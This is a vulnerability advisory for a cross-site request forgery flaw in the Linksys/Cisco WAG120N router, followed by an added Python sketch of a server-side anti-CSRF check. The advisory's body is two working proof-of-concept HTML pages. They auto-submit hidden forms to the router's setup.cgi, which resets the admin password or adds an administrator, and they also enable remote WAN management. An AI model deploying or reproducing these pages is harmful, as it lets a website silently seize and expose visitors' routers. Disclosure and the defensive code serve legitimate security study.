Linksys Cisco Wag120n Cross Site Request Forgery

2011.02.27
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

----------------------------------------------------------------
Hardware : Linksys Cisco Wag120n (and perhaps similar versions)
Type of vulnerability : CSRF ( Change Admin Password And Add User )
Risk of use : High
----------------------------------------------------------------
Producer Website : http://linksysbycisco.com
----------------------------------------------------------------
Discovered by : Khashayar Fereidani
Team Website : Http://IRCRASH.COM
Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim
English Forums : Http://IRCRASH.COM/forums/
Email : irancrash [ a t ] gmail [ d o t ] com
----------------------------------------------------------------
CSRF For Change Admin Password :

#Use sysPasswd and sysConfirmPasswd to set new password

<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action="http://192.168.1.1/setup.cgi" method="POST" name="form">
<input type="hidden" name="user_list" value="1">
<input type="hidden" name="h_user_list" value="1">
<input type="hidden" name="sysname" value="admin">
<input type="hidden" name="sysPasswd" value="password">
<input type="hidden" name="sysConfirmPasswd" value="password">
<input type="hidden" name="remote_management" value="enable">
<input type="hidden" name="http_wanport" value="8080">
<input type="hidden" name="upnp_enable" value="enable">
<input type="hidden" name="wlan_enable" value="enable">
<input type="hidden" name="igmp_proxy_enable" value="enable">
<input type="hidden" name="save" value="Save+Settings">
<input type="hidden" name="h_pwset" value="yes">
<input type="hidden" name="sysname_changed" value="yes">
<input type="hidden" name="pwchanged" value="yes">
<input type="hidden" name="pass_is_default" value="false">
<input type="hidden" name="h_remote_management" value="enable">
<input type="hidden" name="pass_is_none" value="no">
<input type="hidden" name="h_upnp_enable" value="enable">
<input type="hidden" name="h_wlan_enable" value="enable">
<input type="hidden" name="h_igmp_proxy_enable" value="enable">
<input type="hidden" name="todo" value="save">
<input type="hidden" name="this_file" value="Administration.htm">
<input type="hidden" name="next_file" value="Administration.htm">
<input type="hidden" name="message" value="">
<input type="hidden" name="h_wps_cur_status" value="">
</form>
</body>
</html>

----------------------------------------------------------------
CSRF For Add Administrator User:

#Use sysPasswd and sysConfirmPasswd to set new password
#if you add new user you should set pass_is_none=yes

<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action="http://192.168.1.1/setup.cgi" method="POST" name="form">
<input type="hidden" name="user_list" value="2">
<input type="hidden" name="h_user_list" value="2">
<input type="hidden" name="sysname" value="ircrash">
<input type="hidden" name="sysPasswd" value="password">
<input type="hidden" name="sysConfirmPasswd" value="password">
<input type="hidden" name="remote_management" value="enable">
<input type="hidden" name="http_wanport" value="8080">
<input type="hidden" name="upnp_enable" value="enable">
<input type="hidden" name="wlan_enable" value="enable">
<input type="hidden" name="igmp_proxy_enable" value="enable">
<input type="hidden" name="save" value="Save+Settings">
<input type="hidden" name="h_pwset" value="yes">
<input type="hidden" name="sysname_changed" value="yes">
<input type="hidden" name="pwchanged" value="yes">
<input type="hidden" name="pass_is_default" value="false">
<input type="hidden" name="h_remote_management" value="enable">
<input type="hidden" name="pass_is_none" value="yes">
<input type="hidden" name="h_upnp_enable" value="enable">
<input type="hidden" name="h_wlan_enable" value="enable">
<input type="hidden" name="h_igmp_proxy_enable" value="enable">
<input type="hidden" name="todo" value="save">
<input type="hidden" name="this_file" value="Administration.htm">
<input type="hidden" name="next_file" value="Administration.htm">
<input type="hidden" name="message" value="">
<input type="hidden" name="h_wps_cur_status" value="">
</form>
</body>
</html>
----------------------------------------------------------------
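
Added example (not part of the original advisory and not Linksys firmware code): a sketch of the server-side check that would reject the forged setup.cgi forms above, combining a same-origin test on Origin/Referer with a per-session anti-CSRF token. The csrf_token field, SERVER_SECRET, the session id and the other-site.example host are assumptions made for illustration.

```python
from __future__ import annotations
import hashlib
import hmac
from urllib.parse import urlsplit

SERVER_SECRET = b"constructed-demo-secret"  # assumption: random per-boot value on a real device

def issue_token(session_id: str) -> str:
    """Token the admin page would embed as a hidden field (hypothetical name: csrf_token)."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def source_host(headers: dict) -> str | None:
    """host[:port] the browser reports as the request's source (Origin, else Referer)."""
    value = headers.get("Origin") or headers.get("Referer")
    return (urlsplit(value).netloc.lower() or None) if value else None

def allow_state_change(headers: dict, form: dict, session_id: str) -> tuple[bool, str]:
    """Decide whether a settings-changing POST to setup.cgi may be processed."""
    src = source_host(headers)
    if src is None:
        return False, "no usable Origin or Referer header"
    if src != headers.get("Host", "").lower():
        return False, f"cross-site request from {src}"
    expected = issue_token(session_id)
    # Constant-time comparison on bytes so non-ASCII input cannot raise.
    if not hmac.compare_digest(form.get("csrf_token", "").encode(), expected.encode()):
        return False, "missing or wrong anti-CSRF token"
    return True, "ok"

# Constructed sample requests. Field names come from the advisory's forms;
# hosts, session id and the token field are made up for the example.
SESSION = "constructed-session-1"
FIELDS = {"sysname": "admin", "todo": "save", "this_file": "Administration.htm"}
FORGED = ({"Host": "192.168.1.1", "Origin": "http://other-site.example"}, dict(FIELDS))
NO_TOKEN = ({"Host": "192.168.1.1", "Referer": "http://192.168.1.1/Administration.htm"},
            dict(FIELDS))
LEGIT = ({"Host": "192.168.1.1", "Origin": "http://192.168.1.1"},
         dict(FIELDS, csrf_token=issue_token(SESSION)))

if __name__ == "__main__":
    for name, (hdrs, form) in [("forged", FORGED), ("no token", NO_TOKEN), ("legit", LEGIT)]:
        print(name, allow_state_change(hdrs, form, SESSION))
```
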

